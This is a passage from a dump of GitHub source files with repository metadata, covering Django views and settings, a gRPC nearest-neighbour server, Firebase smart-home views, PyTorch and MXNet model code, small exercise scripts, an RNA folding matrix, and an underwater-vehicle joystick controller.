context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff'])\ndef student_attendance_record(request):\n context={}\n context['records'] = Attendance.objects.all()\n return render(request, 'user_management/records.html', context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff'])\ndef student_attendance_report(request):\n rollnumber = request.POST['rollnumber']\n print(rollnumber)\n context={}\n records = Attendance.objects.all()\n total_count = records.count()\n present_record = []\n for record in records:\n if rollnumber in record.studentList:\n present_record.append((record.completeDateTime).strftime('%m/%d/%Y'))\n present_count = len(present_record)\n percent_attendance = (present_count/total_count)*100\n print(percent_attendance)\n context['present_record'] = present_record\n context['percent_attendance'] = percent_attendance\n return render(request, 'user_management/report.html', context)\n","repo_name":"salvieknath18/python_work","sub_path":"Django/Student_Management/user_management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70101235434","text":"\"\"\"\nDjango settings for backend project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.8/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '*3ryzqwd5-ndmywi1#w%31hs@rj8wo+^u8b+7_fc+^0se0kp(('\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 
'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n\n 'rest_framework',\n\n 'apps.sampleapp'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'django',\n 'USER': 'django',\n 'HOST': 'db',\n 'PORT': 5432,\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': ['/src/templates/'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'debug': True,\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nSTATICFILES_DIRS = (\n '/static/',\n)\n\nSTATIC_URL = '/static/'\n\n# User uploads\n\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = '/media/'\n\nREST_FRAMEWORK = {\n 'URL_FIELD_NAME': 'slug'\n}\n","repo_name":"domasx2/django-angular-docker-seed","sub_path":"backend/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"31021735482","text":"\nfrom concurrent import futures\nimport time\n\nimport grpc\n\nimport prediction_pb2\nimport prediction_pb2_grpc\n\nfrom sklearn import neighbors\nimport numpy as np\n\n_ONE_DAY_IN_SECONDS = 60 * 60 * 24\n\n\n# read csv file into numpy\nx = np.genfromtxt(\"C:\\\\data\\\\x.csv\", dtype=np.float64, delimiter=',', skip_header=1)\ny = np.genfromtxt(\"C:\\\\data\\\\y.csv\", dtype=np.float64, delimiter=',', skip_header=1)\n\ndef lnglatWeights(row,geo_multiplier, park_multiplier):\n return [row[0],row[1],row[2]*park_multiplier,row[3]*geo_multiplier,row[4]*geo_multiplier];\n\ngeo_rate = 100000000.\npark_rate = 0.6\n\nx = np.apply_along_axis(lnglatWeights, 1, x, geo_rate, park_rate)\nprint(x)\nprint(y)\n\n\nknc = neighbors.KNeighborsClassifier(algorithm='auto')\n\nknc.fit(x, y)\n\n\nclass PredictionServer(prediction_pb2_grpc.PredictionServiceServicer):\n\n def FindNearestHouseIndices(self, request, context):\n print(request)\n results = knc.kneighbors([[request.NumberOfBedrooms,\n request.NumberOfBathrooms,\n request.NumberOfParkings * park_rate,\n request.Latitude * geo_rate, \n request.Longitude * geo_rate]])\n return prediction_pb2.PredictionResponse(Indices=results[1][0])\n\nport = 51666\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\n prediction_pb2_grpc.add_PredictionServiceServicer_to_server(PredictionServer(), server)\n server.add_insecure_port('[::]:{}'.format(port))\n server.start()\n print(\"Prediction 
Server: {}\".format(port))\n try:\n while True:\n time.sleep(_ONE_DAY_IN_SECONDS)\n except KeyboardInterrupt:\n server.stop(0)\n\n\nif __name__ == '__main__':\n serve()\n","repo_name":"JacobXing/HousePriceScraper","sub_path":"Model/py_server.py","file_name":"py_server.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1759146241","text":"from typing import re\n\nfrom django.shortcuts import render\nfrom firebase import firebase\n# Create your views here.\nfirebase = firebase.FirebaseApplication('https://smarthomev01-626ae.firebaseio.com')\n\ndef sensor_home(request):\n if request.method != \"POST\":\n #result = firebase.get('/test', 'GPIO')\n #print(result)\n '''global LED_status\n LED_status = not LED_status\n firebase.put('/Sensor', 'LED_status', LED_status)'''\n fb_sensor_obj = firebase.get('/Sensor',None)\n print (fb_sensor_obj)\n gas = fb_sensor_obj['GAS']\n rain = fb_sensor_obj['Rain']\n temp_i = fb_sensor_obj['Temp_I']\n temp_o = fb_sensor_obj['Temp_O']\n context={'GAS': gas,\n 'Rain': rain,\n 'Temp_I': temp_i,\n 'Temp_O': temp_o,\n }\n return render(request,\"home.html\",context)\n else:\n return render(request,\"home.html\")\n\ndef RFID_log(request):\n fb_RFID_obj = firebase.get('/Log',None)\n context = {'RFID_log':fb_RFID_obj,\n }\n print(fb_RFID_obj)\n return render(request,\"RFID.html\",context)\n\ndef setting(request):\n if (request.method == \"POST\" and request.POST.get(\"ON\",\"\")):\n rs = 1\n firebase.put(\"/Setting\",\"Rain_status\",rs)\n elif (request.method == \"POST\" and request.POST.get(\"OFF\",\"\")):\n rs = 0\n firebase.put(\"/Setting\",\"Rain_status\",rs)\n elif (request.method == \"POST\" and request.POST.get(\"OK\",\"\")):\n gs = float(request.POST.get(\"gs\"))\n firebase.put(\"/Setting\",\"GAS_alert\",gs)\n fb_setting_obj = firebase.get('/Setting',None)\n GAS_alert = fb_setting_obj['GAS_alert']\n Rain_status = fb_setting_obj['Rain_status']\n print(Rain_status)\n if (Rain_status == 1):\n Rain_status = \"ON\"\n\n elif (Rain_status == 0):\n Rain_status = \"OFF\"\n\n else: Rain_status = \"ERROR\"\n context = {'GAS_alert':GAS_alert,\n 'Rain_status':Rain_status,\n }\n return render(request,\"setting.html\",context)","repo_name":"rsxss/Smart_Home","sub_path":"ESP8266_Smart_Home/Sensor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22245938850","text":"from math import pi\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nfrom net_2d import *\r\nfrom nolinear import *\r\n\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpudir\")\r\nprint(device)\r\n# train_dataset = MyDataset(data_path=\"jihuo/\",data_name=\"data6.txt\",data_lable=\"label6.txt\",transform=transforms.ToTensor())\r\nx = np.loadtxt(\"data2d_4_withempty(1).txt\",delimiter=\" \")\r\nx = torch.from_numpy(x).reshape(-1,1).float()\r\nx = x.to(device)\r\nprint(x.is_cuda)\r\ny = np.loadtxt(\"label2d_4_withempty(1).txt\",delimiter=\" \")\r\ny = torch.from_numpy(y).reshape(-1,1).float()\r\ny =y.to(device)\r\nprint(y.is_cuda)\r\n\r\n#\r\nnet = nolinear().to(device)\r\nnet.load_state_dict(torch.load(\"data1d_12.pth\"))\r\n\r\nloss_fn = torch.nn.MSELoss()\r\nloss_fn.to(device)\r\n#创建优化器\r\nlearning_rata = 1e-4 / 3 #或者使用1e-2代替0.01\r\n# optimizer = torch.optim.SGD(net.parameters(),lr=learning_rata)\r\noptimizer = 
torch.optim.Adam(net.parameters(), lr=learning_rata)\r\n\r\n#训练的次数\r\ntotal_train_step = 0\r\n#测试次数\r\ntotal_test_step = 0\r\n#训练轮数\r\nR =50\r\n\r\n# c = torch.from_numpy(np.linspace(0, 1, num=640)).reshape(-1, 1).float()\r\n# print(c)\r\n# d = net(c)\r\n\r\n# writer = SummaryWriter(\"log_maxernet\")\r\n# start_time = time.time()\r\ntrain_num = 0\r\nnum_of_true = 0\r\ncount =0\r\n\r\n# z = torch.tensor([[1/20]])\r\n\r\n# y=net(z)\r\n\r\n# print(y)\r\n\r\n\r\n\r\nfor t in range(30000):\r\n # Forward pass: compute predicted y by passing x to the model.\r\n # for name,para in net.named_parameters():\r\n # print(para)\r\n y_pred = net(x)\r\n # print(\"\\n\")\r\n \r\n # Compute loss and print it periodically\r\n loss = loss_fn(y_pred, y)\r\n \r\n if t % 100 == 0:\r\n print(t, loss.item())\r\n \r\n # if t % stepnum == 0:\r\n # print(scheduler.get_lr())\r\n \r\n \r\n # Update the network weights using gradient of the loss\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n # scheduler.step()\r\nif(loss.item()<=0.25):\r\n # torch.save(net,\"data2d_4(2).pth\")\r\n torch.save(net.state_dict(),\"data1d_12.pth\")\r\n \r\n# Draw the original random points as a scatter plot\r\nplt.figure()\r\n# fig.add_trace(plt.Scatter(x=x.flatten().numpy(), y=y.flatten().numpy(), mode=\"markers\"))\r\n \r\n# Generate predictions for evenly spaced x-values between minx and maxx\r\nminx = min(list(x.cpu().numpy()))\r\nmaxx = max(list(x.cpu().numpy()))\r\nc = torch.from_numpy(np.linspace(minx, maxx, num=640)).reshape(-1, 1).float().to(device)\r\nd = net(c)\r\n \r\n# Draw the predicted functions as a line graph\r\nplt.title(label = \"nolinear\")\r\nplt.scatter(x=x.cpu().flatten().numpy(), y=y.cpu().flatten().numpy(), c=\"r\",marker=\".\")\r\n# plt.scatter(x=c.flatten().numpy(), y=d.flatten().detach().numpy(), c=\"b\",marker=\".\")\r\nplt.plot(c.cpu().flatten().numpy(), d.cpu().flatten().detach().numpy())\r\nplt.show()","repo_name":"hour-glass110/iteration","sub_path":"testsinnet.py","file_name":"testsinnet.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33783781848","text":"import mxnet as mx\nimport mxnext as X\nfrom mxnext import dwconv, conv, relu6, add, global_avg_pool, sigmoid, to_fp16, to_fp32\nfrom mxnext.backbone.resnet_v1b_helper import resnet_unit\nfrom symbol.builder import Backbone\n\n\ndef _make_divisible(dividend, divisor):\n if dividend % divisor == 0:\n return dividend\n else:\n return (dividend // divisor + 1) * divisor\n\nround32 = lambda dividend: _make_divisible(dividend, 32)\n\n\ndef se(input, prefix, f_down, f_up):\n with mx.name.Prefix(prefix + \"_\"):\n gap = mx.sym.mean(input, axis=-1, keepdims=True)\n gap = mx.sym.mean(gap, axis=-2, keepdims=True)\n fc1 = conv(gap, name=\"fc1\", filter=f_down)\n fc1 = relu6(fc1, name=\"fc1_relu\")\n fc2 = conv(fc1, name=\"fc2\", filter=f_up)\n att = sigmoid(fc2, name=\"sigmoid\")\n input = mx.sym.broadcast_mul(input, att, name=\"mul\")\n\n return input\n\n\ndef convnormrelu(input, prefix, kernel, f_in, f_out, stride, proj, norm, **kwargs):\n with mx.name.Prefix(prefix + \"_\"):\n conv1 = conv(input, name=\"conv1\", filter=f_out, kernel=kernel, stride=stride, no_bias=False)\n bn1 = norm(conv1, name=\"bn1\")\n relu1 = relu6(bn1, name=\"relu1\")\n return relu1\n\n\ndef mbconv(input, prefix, kernel, f_in, f_out, stride, proj, bottleneck_ratio, norm, **kwargs):\n with mx.name.Prefix(prefix + \"_\"):\n if bottleneck_ratio != 1:\n conv1 = 
conv(input, name=\"conv1\", filter=f_in * bottleneck_ratio, no_bias=False)\n bn1 = norm(conv1, name=\"bn1\")\n relu1 = relu6(bn1, name=\"relu1\")\n else:\n relu1 = input\n\n conv2 = dwconv(relu1, name=\"conv2\", filter=f_in * bottleneck_ratio,\n kernel=kernel, stride=stride, no_bias=False)\n bn2 = norm(conv2, name=\"bn2\")\n relu2 = relu6(bn2, name=\"relu2\")\n relu2 = se(relu2, prefix=prefix + \"_se2\", f_down=f_in//4, f_up=f_in * bottleneck_ratio)\n\n conv3 = conv(relu2, name=\"conv3\", filter=f_out, no_bias=False)\n bn3 = norm(conv3, name=\"bn3\")\n\n if proj:\n return bn3\n else:\n return bn3 + input\n\n\nmbc1 = lambda input, prefix, kernel, f_in, f_out, stride, proj, norm, **kwargs: \\\n mbconv(input, prefix, kernel, f_in, f_out, stride, proj, 1, norm, **kwargs)\nmbc6 = lambda input, prefix, kernel, f_in, f_out, stride, proj, norm, **kwargs: \\\n mbconv(input, prefix, kernel, f_in, f_out, stride, proj, 6, norm, **kwargs)\n\n\ndef efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs):\n stages = []\n for i, (u, fo, fi, s, k, c) in enumerate(zip(us, fos, fis, ss, ks, cs), start=1):\n for j in range(1, u + 1):\n s = s if j == 1 else 1\n proj = True if j == 1 else False\n fi = fi if j == 1 else fo\n data = c(data, prefix=\"stage%s_unit%s\" % (i, j), f_in=fi, f_out=fo,\n kernel=k, stride=s, proj=proj, norm=norm)\n stages.append(data)\n return stages\n\n\ndef efficientnet_b4(data, norm, **kwargs):\n # 1.5 GFLOPs\n us = [1, 2, 4, 4, 6, 6, 8, 2, 1]\n fos = [48, 24, 32, 56, 112, 160, 272, 448, 1792]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_b5(data, norm, **kwargs):\n # 2.3 GFLOPs\n us = [1, 3, 5, 5, 7, 7, 9, 3, 1]\n fos = [48, 24, 40, 64, 128, 172, 304, 512, 2048]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n # ks = [3, 5, 5, 5, 5, 5, 5, 5, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_b6(data, norm, **kwargs):\n # 3.3 GFLOPs\n us = [1, 3, 6, 6, 8, 8, 11, 3, 1]\n fos = [56, 32, 40, 72, 144, 200, 344, 576, 2304]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_b7(data, norm, **kwargs):\n # 5.1 GFLOPs\n us = [1, 4, 7, 7, 10, 10, 13, 4, 1]\n fos = [64, 32, 48, 80, 160, 224, 384, 640, 2560]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_fpn_builder(efficientnet):\n class EfficientNetFPN(Backbone):\n def __init__(self, pBackbone):\n super().__init__(pBackbone)\n p = self.p\n data = X.var(\"data\")\n if p.fp16:\n data = data.astype(\"float16\")\n stages = efficientnet(data, p.normalizer, params=p)\n self.symbol = (stages[2], stages[3], stages[5], stages[8])\n\n def get_rpn_feature(self):\n return self.symbol\n\n def get_rcnn_feature(self):\n return self.symbol\n return EfficientNetFPN\n\n\nEfficientNetB4FPN = efficientnet_fpn_builder(efficientnet_b4)\nEfficientNetB5FPN = 
efficientnet_fpn_builder(efficientnet_b5)\nEfficientNetB6FPN = efficientnet_fpn_builder(efficientnet_b6)\nEfficientNetB7FPN = efficientnet_fpn_builder(efficientnet_b7)\n\n\nif __name__ == \"__main__\":\n data = X.var(\"data\")\n norm = X.normalizer_factory()\n *_, last = efficientnet_b4(data, norm)\n mx.viz.print_summary(last, shape={\"data\": (1, 3, 224, 224)})\n","repo_name":"tusen-ai/simpledet","sub_path":"models/efficientnet/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":3070,"dataset":"github-code","pt":"72"} +{"seq_id":"15190157526","text":"cores = {'limpa':'\\033[m',\n 'branco':'\\033[30m',\n 'vermelho':'\\033[31m',\n 'verde':'\\033[32m',\n 'amarelo':'\\033[33m',\n 'azul':'\\033[34m',\n 'roxo':'\\033[35m',\n 'azulclaro':'\\033[36m',\n 'cinza':'\\033[37m',\n 'pretoebranco':'\\033[7;30m'}\n\nvel = int(input('Digite a velocidade do carro: '))\nif vel > 80:\n print('Você receberá uma multa no valor de R${}.'.format(7*(vel-80)))\nelse:\n print('Tenha um bom dia! Dirija com segurança!')","repo_name":"VitorFRodrigues/Python-curso","sub_path":"PythonExercicios/ex029.py","file_name":"ex029.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17986197327","text":"\"\"\"\nAs Dr. Aziz allowed us to make a program that fills the matrix for us, I am writing this script to do the job. \n\n\nThe sequence in question:\n5'-UGCUCCUAGUACGAGAGGACCGGAGUG-3'\n\nJob: Apply NJ algorithm.\n\"\"\"\n\nimport numpy as np\nimport seaborn as sns; sns.set()\nimport matplotlib.pyplot as plt\n\nseq = 'UGCUCCUAGUACGAGAGGACCGGAGUG'\n\ndef score(i, j):\n ri = seq[i]\n rj = seq[j]\n\n if (ri == 'G' and rj == 'C') or (ri == 'C' and rj == 'G'):\n return 3\n \n if (ri == 'A' and rj == 'U') or (ri == 'U' and rj == 'A'):\n return 2\n\n if (ri == 'G' and rj == 'U') or (ri == 'U' and rj == 'G'):\n return 1\n\n return 0\n\ndef fourth_condition_calculator(i, j, matrix):\n k = i + 1\n\n vals = []\n\n if k >= j:\n return 0\n\n while (k > i and k < j):\n vals += [matrix[i][k] + matrix[k+1][j]]\n k += 1\n\n return max(vals)\n\n\ndef main():\n\n length = len(seq)\n matrix = np.zeros((length, length), dtype= int)\n \n for j in range(1,length):\n for i in range(0, j):\n\n if (j - i) < 4:\n matrix[i][j] = 0\n continue\n \n bottom = matrix[i+1][j]\n left = matrix[i][j-1]\n diag = matrix[i+1][j-1] + score(i,j)\n fourth_condition = fourth_condition_calculator(i,j, matrix)\n\n matrix[i][j] = max([bottom, left, diag, fourth_condition])\n\n \"\"\" \n Using the below three lines to plot my matrix\n \"\"\"\n from matplotlib.colors import ListedColormap\n\n with sns.axes_style('white'):\n sns.heatmap(matrix,\n cbar=False, \n square=False, \n annot=True, \n fmt='d', \n xticklabels=False, \n yticklabels=False, \n cmap=ListedColormap(['white']), \n linewidths=0.5)\n \n plt.show()\n\nmain()","repo_name":"soomro-abd/Computational-Biology","sub_path":"Assignment 3/part1_q3.py","file_name":"part1_q3.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14818991326","text":"\r\nimport Serial_1\r\nimport Serial_2\r\nimport valves\r\nimport pygame\r\nimport time\r\nimport os\r\n\r\n#############################################################\r\nglobal returned_dic\r\n###################\r\nglobal roll_val\r\nglobal pitch_val\r\nglobal yaw_val\r\nglobal 
accx\r\nglobal accy\r\nglobal accz\r\nglobal patm\r\nglobal depth\r\nglobal uw\r\nglobal temp\r\nglobal warning\r\nglobal front_1\r\nglobal front_2\r\nglobal Rear_1\r\nglobal Rear_2\r\nglobal up_1\r\nglobal up_2\r\nglobal valve1\r\nglobal valve2\r\nglobal valve3\r\nglobal valve4\r\n###################\r\nglobal ser1_status\r\nglobal ser2_status\r\nglobal IMU_status\r\nglobal Pressure_status\r\nglobal joystick_status\r\n###################\r\nglobal joystick\r\n\r\nglobal y1\r\nglobal x2\r\nglobal x3\r\nglobal y3\r\nglobal AB\r\nglobal BB\r\nglobal XB\r\nglobal YB\r\nglobal LB\r\nglobal RB\r\n#############################################################\r\nroll_val=1\r\npitch_val=2\r\nyaw_val=3\r\naccx=4\r\naccy=5\r\naccz=6\r\npatm=7\r\ndepth=8\r\nuw=9\r\ntemp=10\r\nwarning=11\r\nfront_1=12\r\nfront_2 = 13\r\nRear_1 = 14\r\nRear_2=15\r\nup_1=16\r\nup_2=17\r\nvalve1=0\r\nvalve2=0\r\nvalve3=0\r\nvalve4=0\r\n\r\ny1=0\r\nx2=0\r\nx3=0\r\ny3=0\r\n\r\n\r\n\r\nAB=0\r\nBB=0\r\nXB=0\r\nYB=0\r\nLB=0\r\nRB=0\r\n\r\n###################\r\nser1_status = False\r\nser2_status=False\r\nIMU_status= False\r\nPressure_status= False\r\njoystick_status= False\r\n#############################################################\r\ndef map_RPM(value, input_min, input_max, output_min, output_max):\r\n output_value = (value - input_min) * (output_max - output_min) / (input_max - input_min) + output_min\r\n RPM = (-1.5933631381478e-5)*(output_value**3) + 0.0720860955611188*(output_value**2) - 98.9465426312546*output_value + 39966.4666710835\r\n return RPM\r\n\r\ndef Serial_1_try_connect():\r\n if Serial_1.Get_status()==False:\r\n Serial_1.try_connect()\r\n\r\ndef Serial_2_try_connect():\r\n if Serial_2.Get_status()==False:\r\n Serial_2.try_connect()\r\n \r\n\r\ndef Serial_1_Get_status():\r\n return Serial_1.Get_status()\r\n\r\ndef Serial_2_Get_status():\r\n return Serial_2.Get_status()\r\n\r\ndef return_data():\r\n global returned_dic\r\n # print(returned_dic)\r\n return returned_dic\r\n\r\n \r\n#############################################################\r\n\r\n\r\n\r\n# initialize the joystick module\r\npygame.init()\r\n\r\n\r\nSerial_1.try_connect()\r\nSerial_2.try_connect()\r\n\r\n\r\n# loop to continuously read the joystick values and send them to Arduino\r\ndef Run():\r\n #############################################################\r\n global returned_dic\r\n ###################\r\n global roll_val\r\n global pitch_val\r\n global yaw_val\r\n global accx\r\n global accy\r\n global accz\r\n global patm\r\n global depth\r\n global uw\r\n global temp\r\n global warning\r\n global front_1\r\n global front_2\r\n global Rear_1\r\n global Rear_2\r\n global up_1\r\n global up_2\r\n global valve1\r\n global valve2\r\n global valve3\r\n global valve4\r\n ###################\r\n global ser1_status\r\n global ser2_status\r\n global IMU_status\r\n global Pressure_status\r\n global joystick_status\r\n ###################\r\n global joystick\r\n\r\n global y1\r\n global x2\r\n global x3\r\n global y3\r\n global AB\r\n global BB\r\n global XB\r\n global YB\r\n global LB\r\n global RB\r\n \r\n \r\n #############################################################\r\n \r\n try:\r\n joystick = pygame.joystick.Joystick(0)\r\n joystick.init()\r\n pygame.event.get()\r\n joystick_status=True\r\n \r\n \r\n except:\r\n # joystick.quit()\r\n joystick_status=False\r\n\r\n # print(pygame.joystick.get_count())\r\n\r\n \r\n\r\n\r\n\r\n if joystick_status==True:\r\n \r\n \r\n y1=joystick.get_axis(1) \r\n # print(y1)\r\n x2=joystick.get_axis(2) \r\n 
x3=joystick.get_axis(4)\r\n y3=joystick.get_axis(5)\r\n\r\n # print(y1,x2,x3,y3)\r\n \r\n AB=joystick.get_button(0)\r\n BB=joystick.get_button(1)\r\n XB=joystick.get_button(2)\r\n YB=joystick.get_button(3)\r\n LB=joystick.get_button(4)\r\n RB=joystick.get_button(5)\r\n\r\n if(x3==0 and y3==0):\r\n joystick_status=False\r\n\r\n \r\n\r\n\r\n\r\n # read the joystick axes and normalize their values to between 0 and 180\r\n BUTTON_FORW_BACK= int(y1 * 90 + 90) #0\r\n BUTTON_LR = int(x2 * 90 + 90) #2\r\n BUTTON_UP = int(y3 * 90 + 90) #4\r\n BUTTON_DOWN = int(x3* 90 + 90) #5\r\n # readRPM values to between 0 and 3075\r\n\r\n print(BUTTON_FORW_BACK,BUTTON_LR,BUTTON_UP,BUTTON_DOWN)\r\n\r\n forw_ = map_RPM(BUTTON_FORW_BACK, 70, 0, 1500, 1850)\r\n back_ = map_RPM(BUTTON_FORW_BACK, 100, 180, 1500, 1150)\r\n right = map_RPM(BUTTON_LR, 70, 0, 1500, 1850)\r\n right_1 = map_RPM(BUTTON_LR, 70, 0, 1500, 1150)\r\n left = map_RPM(BUTTON_LR, 100, 180, 1500, 1150)\r\n left_1 = map_RPM(BUTTON_LR, 100, 180, 1500, 1850)\r\n UP = map_RPM(BUTTON_UP, 90, 170, 1500, 1850)\r\n DOWN = map_RPM(BUTTON_DOWN, 90, 170, 1500, 1150)\r\n \r\n if (BUTTON_FORW_BACK < 70 and not (BUTTON_LR > 100 or BUTTON_LR < 70) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=forw_\r\n front_2 = forw_\r\n Rear_1 = forw_\r\n Rear_2=forw_\r\n up_1=0\r\n up_2=0\r\n \r\n elif (BUTTON_FORW_BACK > 100 and not (BUTTON_LR > 100 or BUTTON_LR < 80) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=back_\r\n front_2 = back_\r\n Rear_1 = back_\r\n Rear_2=back_\r\n up_1=0\r\n up_2=0\r\n elif (BUTTON_LR < 70 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=right\r\n front_2 = right\r\n Rear_1 = right_1\r\n Rear_2=right_1\r\n up_1=0\r\n up_2=0\r\n elif (BUTTON_LR > 100 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=left\r\n front_2 = left\r\n Rear_1 = left_1\r\n Rear_2=left_1\r\n up_1=0\r\n up_2=0\r\n elif (BUTTON_DOWN > 0 and not BUTTON_UP > 0 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not (BUTTON_LR > 100 or BUTTON_LR < 70)):\r\n up_1=DOWN\r\n up_2=DOWN\r\n elif (BUTTON_UP > 0 and not BUTTON_DOWN > 0 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not (BUTTON_LR > 100 or BUTTON_LR < 70)):\r\n up_1=UP\r\n up_2=UP\r\n else:\r\n front_1=0\r\n front_2 = 0\r\n Rear_1 = 0\r\n Rear_2=0\r\n up_1=0\r\n up_2=0\r\n \r\n\r\n data_motors=\"#\"+str(BUTTON_FORW_BACK)+\"|\"+str(BUTTON_LR)+\"|\"+str(BUTTON_UP)+\"|\"+str(BUTTON_DOWN)+\"|\"+str((time.time()*20)%2)+\"|\"+str(int(joystick_status))+\"*\"+'\\n'\r\n Serial_2.write(data_motors) \r\n\r\n #print()\r\n\r\n data_valves=\"#\"+str(int(valve1))+\"|\"+str(int(valve2))+\"|\"+str(int(valve3))+\"|\"+str(int(valve4))+\"*\"+'\\n'\r\n Serial_1.write(data_valves)\r\n \r\n\r\n\r\n Serial_1.Get_Data_With_Format('#', '|', '*')\r\n\r\n #print(Serial_1.Get_Var(8))\r\n\r\n patm=Serial_1.Get_Var(1)/1000\r\n uw = Serial_1.Get_Var(2)/1000\r\n depth = Serial_1.Get_Var(3)/100\r\n temp=Serial_1.Get_Var(4)/10\r\n\r\n accx=Serial_1.Get_Var(5)/98\r\n accy=Serial_1.Get_Var(6)/98\r\n accz=Serial_1.Get_Var(7)/98\r\n\r\n pitch_val=Serial_1.Get_Var(8)\r\n roll_val=Serial_1.Get_Var(9)\r\n yaw_val=Serial_1.Get_Var(10)\r\n\r\n \r\n ser1_status=Serial_1.Get_status()\r\n ser2_status=Serial_2.Get_status()\r\n\r\n valve1=valves.process(AB,BB,XB,YB,LB,RB)[0]\r\n valve2=valves.process(AB,BB,XB,YB,LB,RB)[1]\r\n valve3=valves.process(AB,BB,XB,YB,LB,RB)[2]\r\n 
